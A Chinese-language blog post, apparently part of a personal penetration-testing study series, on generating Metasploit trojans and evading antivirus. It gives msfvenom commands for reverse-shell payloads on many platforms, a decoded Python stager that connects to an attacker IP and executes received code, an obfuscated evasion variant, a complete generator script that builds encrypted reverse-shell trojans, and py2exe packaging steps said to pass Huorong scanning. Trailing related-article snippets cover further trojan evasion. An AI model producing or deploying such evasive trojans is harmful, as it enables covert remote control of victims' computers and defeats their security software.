MSF(2)——各种木马的生成及简单的免杀

article/2025/9/24 2:08:43

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

文章目录

    • 前文链接
    • 木马生成
    • 免杀
      • php 免杀
      • Python 免杀
        • 分析木马文件
        • 编写免杀马
        • 打包exe

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)

木马生成

这里是各种木马的生成示例

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f elf > shell.elfWindows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f exe > shell.exeMac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f macho > shell.machoPHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f raw > shell.phpASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f asp > shell.aspJSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f raw > shell.jspWAR 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f war > shell.warBath
msfvenom -p cmd/unix/reverse_bash LHOST=你的IP LPORT=你监听的端口 -f raw > shell.shPerl
msfvenom -p cmd/unix/reverse_perl LHOST=你的IP LPORT=你监听的端口 -f raw > shell.plPython 
msfvenom -p python/meterpreter/reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f raw > shell.py

在实际渗透过程中根据需求生成

免杀

这里主要是php的免杀和Python的免杀,原理都是自定义加密及解密

php 免杀

可参考前文 https://blog.csdn.net/realmels/article/details/119280877

Python 免杀

重点来了

使用上文方法生成的木马,所有的木马都会报毒

D盾扫描结果
、
火绒扫描结果
在这里插入图片描述
而对于exe的免杀比较复杂(主要我不会),所以在这里介绍一种简单的免杀方法。

我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行免杀,最后将该木马打包成可执行文件exe,就可以实现免杀

分析木马文件

用Pycharm打开木马文件,可以看到这样的东西

exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjIwLjEyOCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))

相比PHP的鬼马,py的马看起来就亲切多了

这段代码中用exec函数执行了一个字符串,很显然,该字符串通过base64加密,而b64decode等函数的作用就是对字符串进行解密。

把字符串解密后内容为。

import socket,zlib,base64,struct,time
for x in range(10):try:s=socket.socket(2,socket.SOCK_STREAM)s.connect(('192.168.220.128',8888))breakexcept:time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})

虽然代码我看不太懂,但大体是通过socket主动连接攻击机。其中,192.168.220.128是我生成木马时设置的ip,8888是我生成木马时设定的端口。

其实此时直接把这一段代码拿出来就不会报毒了

火绒扫描结果

但是我并不甘心止步于此,因此就有了下面的一系列操作

编写免杀马

先看下最后免杀的马

import base64
s1=r"""ÌÓÕƒÒÎ×Ý̏ÄÈ—ÖÕÆÌÈmÒƒƒÑÕÑÈ”Œpƒƒ×ÜpƒƒƒƒÖ ÖÆÈ‘ÒÎוƒÒÎ×¶¦Â·¨°pƒƒƒƒÖÆÑÈ׋”•”›•“”›››ŒpƒƒƒƒÅÈÎmƒƒÛӝmƒƒƒƒÌÈÖÈÓ˜pÏ ÖÕÆ‘ÑÄΊ¬ÖÕÆ‹Œ¾Àmƒƒ‘ÈÙÏpÚÌÈÏÑǃƒmƒƒƒ ÖÕÆ‹ƒƒÈ‹ŒpÈÈ‹ÏÅÇÆÐÕÖ‹ÄÈ—Å—ÈÒÈÇŒƒŠŠƒàpccŸ¡¦¥•—^ž””¥h^¦§¦¦Ÿ?˜¤ª›R“™Zbl<RR¤l<RRRRRR¡¦¥•—Z^¥•—`}
„s[<RRRR`¡ •ZYk`h`d`dYRjj[<RRRR¤“?RR—•—¦?RRRR¦Ÿ`ž—Z[<RR¦§¦§¢•ZpYR`—¨f[b?–o¥¤•Z[<šžR—Z[nž?RR–]R`—¨ž_ž –[<ª•¬›`—¡¢—¥”¥h`h–•–Z[^­¥l¥[<2"""
s2=r"ZGVmIHBhcnNlS2V5KGtleSk6CiAgICBpZiBrZXkgIT0gIiI6CiAgICAgICAgbyA9IDAKICAgICAgICBmb3IgayBpbiBrZXk6CiAgICAgICAgICAgIG4gPSAwCiAgICAgICAgICAgIGkgPSBzdHIob3JkKGspKQogICAgICAgICAgICBmb3IgdCBpbiBpOgogICAgICAgICAgICAgICAgbiArPSBpbnQodCkKICAgICAgICAgICAgbyArPSBuCiAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgaWYgbyA8IDEwOgogICAgICAgICAgICAgICAgbyA9IGludChvICogMikKICAgICAgICAgICAgZWxpZiBvID4gMTAwOgogICAgICAgICAgICAgICAgbyA9IGludChvIC8gMikKICAgICAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgIHJldHVybiBvCiAgICByZXR1cm4="
s3=r"ZGVmIGRlY3J5cHQoZGF0YSxrZXkpOgogICAgaWYgZGF0YSA9PSAiIjoKICAgICAgICByZXR1cm4KICAgIHJlc3VsdCA9ICIiCiAgICBrZXljb2RlMSA9IHBhcnNlS2V5KGtleSkKICAgIGEgPSBsZW4oZGF0YSkgLy8gMgogICAgYjEgPSBkYXRhWzphXQogICAgYjIgPSBkYXRhW2E6XQogICAgYyA9IFtvcmQoZCkgZm9yIGQgaW4gYjFdCiAgICBlID0gW2YgLSBrZXljb2RlMSBmb3IgZiBpbiBjXQogICAgZyA9IHN0cihzdW0oYykpCiAgICBrZXljb2RlMiA9IHBhcnNlS2V5KGcpCiAgICBoID0gW29yZChpKSBmb3IgaSBpbiBiMl0KICAgIGogPSBbayAtIGtleWNvZGUyIGZvciBrIGluIGhdCiAgICBrID0gbGVuKGUpIC8vIDIKICAgIGdyb3VwMSA9IGVbOmtdCiAgICBncm91cDQgPSBlW2s6XQogICAgZ3JvdXAyID0gals6a10KICAgIGdyb3VwMyA9IGpbazpdCiAgICBkYXRhbGVuZ3RoID0gbGVuKGdyb3VwMSkgKyBsZW4oZ3JvdXAyKSArIGxlbihncm91cDMpICsgbGVuKGdyb3VwNCkKICAgIGwgPSBkYXRhbGVuZ3RoIC8vIDQKICAgIG0gPSBbXQogICAgZm9yIG4gaW4gcmFuZ2UobCk6CiAgICAgICAgbS5hcHBlbmQoZ3JvdXAxW25dKQogICAgICAgIG0uYXBwZW5kKGdyb3VwMltuXSkKICAgIG8gPSBbXQogICAgZm9yIHAgaW4gcmFuZ2UobCk6CiAgICAgICAgby5hcHBlbmQoZ3JvdXAzW3BdKQogICAgICAgIG8uYXBwZW5kKGdyb3VwNFtwXSkKICAgIHEgPSBtICsgbwogICAgZm9yIHIgaW4gcToKICAgICAgICBpZiBub3Qgcj09MDoKICAgICAgICAgICAgcmVzdWx0ICs9IGNocihyKQogICAgcmV0dXJuIHJlc3VsdAo="
key = "h&ZKsa.BEn"
exec(base64.b64decode(s2))
exec(base64.b64decode(s3))
exec(decrypt(s1,key)[0:-5])

这个s2和s3分别是base64加密后的代码,解密后内容为:

s2

def parseKey(key):if key != "":o = 0for k in key:n = 0i = str(ord(k))for t in i:n += int(t)o += nwhile True:if o < 10:o = int(o * 2)elif o > 100:o = int(o / 2)else:return oreturn

s3

def decrypt(data,key):if data == "":returnresult = ""keycode1 = parseKey(key)a = len(data) // 2b1 = data[:a]b2 = data[a:]c = [ord(d) for d in b1]e = [f - keycode1 for f in c]g = str(sum(c))keycode2 = parseKey(g)h = [ord(i) for i in b2]j = [k - keycode2 for k in h]k = len(e) // 2group1 = e[:k]group4 = e[k:]group2 = j[:k]group3 = j[k:]datalength = len(group1) + len(group2) + len(group3) + len(group4)l = datalength // 4m = []for n in range(l):m.append(group1[n])m.append(group2[n])o = []for p in range(l):o.append(group3[p])o.append(group4[p])q = m + ofor r in q:if not r==0:result += chr(r)return result

如果看过这篇文章,就会发现,这里面s2,s3对应的代码,正是我在文件加密器里使用的密码算法。

我的思路就是将代码块,通过我先前的密码算法加密后,在木马中解密,最后执行。

运行该Python程序,MSF是可以收到回显的
在这里插入图片描述
因此,我还写了一个木马生成器
Generater.py

import re
import random
import os
class Cipher:key = ""def __init__(self, key):self.key = keydef setKey(self, key):self.key = keydef getKey(self):return self.keydef parseKey(self, key):if key != "":o = 0for k in key:n = 0i = str(ord(k))for t in i:n += int(t)o += nwhile True:if o < 10:o = int(o * 2)elif o > 100:o = int(o / 2)else:return oreturndef getOdd(self, max):return [i for i in range(1, max + 1) if i % 2 == 1]def encrypt(self, data):if data == "":returnresult = ""length = len(data)a = [ord(x) for x in data]remainder = length % 4if remainder != 0:b = 4 - remainderfor c in range(b):a.append(0)groups = []d = len(a) // 2e1 = a[:d]e2 = a[d:]indexs = self.getOdd(d)groups.append([e1[i - 1] for i in indexs])groups.append([e1[i] for i in indexs])groups.append([e2[i - 1] for i in indexs])groups.append([e2[i] for i in indexs])f1 = groups[0] + groups[3]f2 = groups[1] + groups[2]keycode1 = self.parseKey(self.getKey())g = []for h in f1:i = h + keycode1j = chr(i)g.append(i)result += jk = str(sum(g))keycode2 = self.parseKey(k)for l in f2:m = l + keycode2n = chr(m)result += nreturn resultdef gene_code(ip,port):s="""import socket,zlib,base64,struct,time
for x in range(10):try:s = socket.socket(2, socket.SOCK_STREAM)s.connect(('%s', %d))breakexcept:time.sleep(5)
l = struct.unpack('>I', s.recv(4))[0]
d = s.recv(l)
while len(d) < l:d += s.recv(l - len(d))
exec(zlib.decompress(base64.b64decode(d)), {'s': s})"""return s%(ip,port)def gene_key(len=10,f=33,t=125):res=""for i in range(len):res+=chr(random.randint(f,t))return resdef gene_shell(s,k):res=r"""# coding=UTF8
import base64,re
s1=r'''%s'''
s2=r"ZGVmIHBhcnNlS2V5KGtleSk6CiAgICBpZiBrZXkgIT0gIiI6CiAgICAgICAgbyA9IDAKICAgICAgICBmb3IgayBpbiBrZXk6CiAgICAgICAgICAgIG4gPSAwCiAgICAgICAgICAgIGkgPSBzdHIob3JkKGspKQogICAgICAgICAgICBmb3IgdCBpbiBpOgogICAgICAgICAgICAgICAgbiArPSBpbnQodCkKICAgICAgICAgICAgbyArPSBuCiAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgaWYgbyA8IDEwOgogICAgICAgICAgICAgICAgbyA9IGludChvICogMikKICAgICAgICAgICAgZWxpZiBvID4gMTAwOgogICAgICAgICAgICAgICAgbyA9IGludChvIC8gMikKICAgICAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgIHJldHVybiBvCiAgICByZXR1cm4="
s3=r"ZGVmIGRlY3J5cHQoZGF0YSxrZXkpOgogICAgaWYgZGF0YSA9PSAiIjoKICAgICAgICByZXR1cm4KICAgIHJlc3VsdCA9ICIiCiAgICBrZXljb2RlMSA9IHBhcnNlS2V5KGtleSkKICAgIGEgPSBsZW4oZGF0YSkgLy8gMgogICAgYjEgPSBkYXRhWzphXQogICAgYjIgPSBkYXRhW2E6XQogICAgYyA9IFtvcmQoZCkgZm9yIGQgaW4gYjFdCiAgICBlID0gW2YgLSBrZXljb2RlMSBmb3IgZiBpbiBjXQogICAgZyA9IHN0cihzdW0oYykpCiAgICBrZXljb2RlMiA9IHBhcnNlS2V5KGcpCiAgICBoID0gW29yZChpKSBmb3IgaSBpbiBiMl0KICAgIGogPSBbayAtIGtleWNvZGUyIGZvciBrIGluIGhdCiAgICBrID0gbGVuKGUpIC8vIDIKICAgIGdyb3VwMSA9IGVbOmtdCiAgICBncm91cDQgPSBlW2s6XQogICAgZ3JvdXAyID0gals6a10KICAgIGdyb3VwMyA9IGpbazpdCiAgICBkYXRhbGVuZ3RoID0gbGVuKGdyb3VwMSkgKyBsZW4oZ3JvdXAyKSArIGxlbihncm91cDMpICsgbGVuKGdyb3VwNCkKICAgIGwgPSBkYXRhbGVuZ3RoIC8vIDQKICAgIG0gPSBbXQogICAgZm9yIG4gaW4gcmFuZ2UobCk6CiAgICAgICAgbS5hcHBlbmQoZ3JvdXAxW25dKQogICAgICAgIG0uYXBwZW5kKGdyb3VwMltuXSkKICAgIG8gPSBbXQogICAgZm9yIHAgaW4gcmFuZ2UobCk6CiAgICAgICAgby5hcHBlbmQoZ3JvdXAzW3BdKQogICAgICAgIG8uYXBwZW5kKGdyb3VwNFtwXSkKICAgIHEgPSBtICsgbwogICAgZm9yIHIgaW4gcToKICAgICAgICBpZiBub3Qgcj09MDoKICAgICAgICAgICAgcmVzdWx0ICs9IGNocihyKQogICAgcmV0dXJuIHJlc3VsdAo="
key = r'''%s'''
exec(base64.b64decode(s2))
exec(base64.b64decode(s3))
exec(decrypt(s1,key))
"""res=res%(s,k)name=gene_key(12,65,90)path=os.getcwd()+'/'+name+".py"with open(path,'w',encoding='utf-8') as f:f.write(res)print("生成成功,生成位置为:\n"+path)if __name__ == '__main__':ip=input("请输入监听IP >>>")port=input("请输入监听端口 >>>")if not re.match(re.compile(r'^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.((1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.){2}(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$'),ip)!=None:print('IP不正确')exit()try:port=int(port)except:print("PORT不正确")exit()if not 0<port<65536:print("PORT不正确")exit()code=gene_code(ip,port)key=gene_key()c=Cipher(key)s1=c.encrypt(code)gene_shell(s1,key)

打包exe

在支持py的目标上,可以直接使用该程序。

但事实是,大部分Windows服务器是没有Python环境的

因此,要将该木马程序打包为exe

我本来是想用pyinstaller的,但不知道为什么pyinstaller生成的马运行不了,因此我用py2exe来打包exe

py2exe可以直接用pip下载

pip install py2exe

接下来在跟木马文件同目录下,创建一个python文件,名称任意

例如,我的木马文件名为shell.py,新建的文件名为1.py
在这里插入图片描述
1.py中输入如下代码

from distutils.core import setup
import py2exesetup(
name = "shell",
description = "Python-based App",
version = "1.0",
windows = ["shell.py"], #shell名称
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)

shell.py位置填木马的文件名

用控制台运行该程序

python .\1.py py2exe

在这里插入图片描述
在dist目录中有exe文件

火绒扫描不报毒
在这里插入图片描述
可以反弹shell

在这里插入图片描述
注意,在msfconsoel中,payload要设为python/meterpreter/reverse_tcp


http://chatgpt.dhexx.cn/article/f6Fg3jWN.shtml

相关文章

PHP一句话木马免杀

作者&#xff1a;小刚 一位苦于信息安全的萌新小白帽&#xff0c;记得关注给个赞&#xff0c;谢谢 本实验仅用于信息防御教学&#xff0c;切勿用于其它用途 PHP木马免杀小技巧 免杀小技巧1.字符串拼接方式&#xff0c;构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用…

一句话木马及免杀

这篇文章主要是总结一句话木马&#xff0c;并实现一句话木马的简单免杀&#xff0c;以及一个不死马的实现。 文章目录 一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马 不死马 一句话木马及原理 首…

cobalt strike木马免杀

0x001-针对powershell免杀 工具&#xff1a;Invoke-Obfuscation 操作实例&#xff1a; 1、利用CS生成powershell木马 2、进入invoke-Obsfuscation文件&#xff0c;使用powershell命令执行 3、利用powershell命令执行免杀后的ps1文件&#xff0c;成功上线 0x002 -针…

一句话木马以及免杀

此篇只讨论php&#xff0c;其实原理是相同的&#xff0c;本文的思路依然适用于其他语言 WAF一般都是维护一个规则库&#xff0c;记录webshell常用的函数、方法等等&#xff0c;通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警&#xff0c;但是规则匹配肯定会…

Python木马分离免杀(下载分离型)

渗透环境&#xff1a; 目标主机&#xff1a;win10-192.168.159.133-杀软360、火绒、微步云沙盒 攻击主机&#xff1a;kali-192.168.159.129 使用工具&#xff1a;msfconsole、pyinstaller、pycharm 木马制作过程&#xff1a; 1、msfconsole的msfvenom模块生成shellcode k…

关于木马免杀的一些方法

一、免杀简述 ​ 理论上讲&#xff0c;免杀⼀定是出现在杀毒软件之后的。⽽通过杀毒软件的发展史不难知 道&#xff0c;第⼀款杀毒软件 kill 1.0是Wish公司1987年推出的&#xff0c;也就是说免杀技术⾄少是在 1989年以后才发展起来的。 ​ 1989年&#xff1a;第⼀款杀毒软件M…

MSF木马的免杀(三)

目录 MSF木马的免杀 C/C加载免杀 加图标 MSF木马的免杀 MSF下输入下列命令&#xff0c;生成免杀shellcode msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOSTx.x.x.x LPORT8888 -e x86/shikata_ga_nai -i 15 -b \x00\ PrependMigratetrue Pre…

木马免杀平台

VirScan 《多引擎在线扫描平台》 访问&#xff1a;https://www.virscan.org/ VirusTotal 《威胁猎捕平台》 访问&#xff1a;https://www.virustotal.com/gui/home/upload Jotti 《恶意软件扫描系统》 访问&#xff1a;https://virusscan.jotti.org/ 腾讯哈勃分析系统 《文件…

绕过杀毒软件,免杀木马制作

绕过杀毒软件&#xff0c;免杀木马制作&#xff08;以AVG Anti Spyware杀毒软件为例&#xff09; 一、将Sever.exe打开&#xff0c;分块生成100个文件 二、使用AVG Anti Spyware查杀生成的文件&#xff0c;再二次处理&#xff0c;重复这个过程&#xff0c;直到缩小到很小的范围…

木马的伪装与免杀

0x01:我们依靠msf生成简单的shellcode免杀 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOSTXXX LPORTXXX -e x86/shikata_ga_nai -i 12 -b \x00\ PrependMigratetrue PrependMIgrateProxsvchost.exe -f c > /root/Desktop/shellcode.c 这里我们生成…

后渗透-木马免杀

木马免杀 0x00 免杀 木马免杀的方法有很多种&#xff0c;如反转、异或、远程加载、加壳等&#xff0c;这里举例反转加异或 0x01 利用msfvenom制作木马 sfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.12.135 LPORT5555 -f py > 2.py# -p 指定payload # LHO…

APT之木马静态免杀

前言 这篇文章主要是记录手动编写代码进行木马免杀&#xff0c;使用工具也可以免杀&#xff0c;只不过太脚本小子了&#xff0c;而且工具的特征也容易被杀软抓到&#xff0c;指不定哪天就用不了了&#xff0c;所以要学一下手动去免杀木马&#xff0c;也方便以后开发一个只属于…

【木马免杀】

文章目录 前言题目一.免杀需求&#xff0c;查杀技术&#xff0c;免杀技巧&#xff0c;免杀实战免杀需求查杀技术免杀技巧免杀实战webshell免杀&#xff1a;1.引用免杀2.可变变量3.二维数组4.数组交集5.回调函数6.编码 木马免杀&#xff1a;1.msf自带免杀2.msf捆绑免杀3.msf自带…

2021Kali -- 木马免杀制作

​知道为什么梦里的人都看不清脸么&#xff1f;因为怕你当真。。。 ---- 网易云热评 一、通过MSF生成shellcode 1、启动MSF&#xff0c;演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b \x00 l…

msf生成免杀木马

一.杀软原理 免杀概念免杀&#xff0c;也就是反病毒&#xff08;AntiVirus&#xff09;与反间谍&#xff08;AntiSpyware&#xff09;的对立面&#xff0c;英文为Anti-AntiVirus&#xff08;简写Virus AV&#xff09;&#xff0c;逐字翻译为“反-反病毒”&#xff0c;翻译为“…

052 木马免杀全攻略

木马免杀全攻略 转载自&#xff1a;a1pass.blog.163.com 2007-12-07 14:02:24| 分类&#xff1a; 思绪燃星火——技 | 标签&#xff1a;黑客 杂志刊物 作者&#xff1a;A1Pass 出处&#xff1a;http://a1pass.blog.163.com/ 本文发表于07年第7期《黑客X档案》&#xff0c;与原…

渗透测试-木马免杀的几种方式

前言 免杀&#xff0c;又叫免杀毒技术&#xff0c;是反病毒&#xff0c;反间谍的对立面&#xff0c;是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外&#xff0c;还可以扩增病毒木马的功能&#xff0c;改变病毒木马的行为。免杀的基本特征是破坏…

木马免杀方式

前言 免杀&#xff0c;又叫免杀毒技术&#xff0c;是反病毒&#xff0c;反间谍的对立面&#xff0c;是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外&#xff0c;还可以扩增病毒木马的功能&#xff0c;改变病毒木马的行为。免杀的基本特征是破坏…

Kali渗透-MSF木马免杀技术

前言 免杀技术全称为反杀毒技术 Anti-Virus 简称“免杀”&#xff0c;它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广&#xff0c;其中包含反汇编、逆向工程、系统漏洞等技术&#xff0c;内容基本上都是修改病毒、木马的内容改变特征码&#…

C语言C++制作游戏外挂,一个简单的内存外挂!

通过 C 语言编写一个简单的外挂&#xff0c;通过 API 函数修改游戏数据&#xff0c;从而实现作弊功能 对象分析 要用的 API 函数简单介绍 编写测试效果 总体评价 下面是小编整理好的一套C/C资料&#xff0c;加小编C/C编程学习群825414254获取系统性学习C/C的学习资料 对象分析…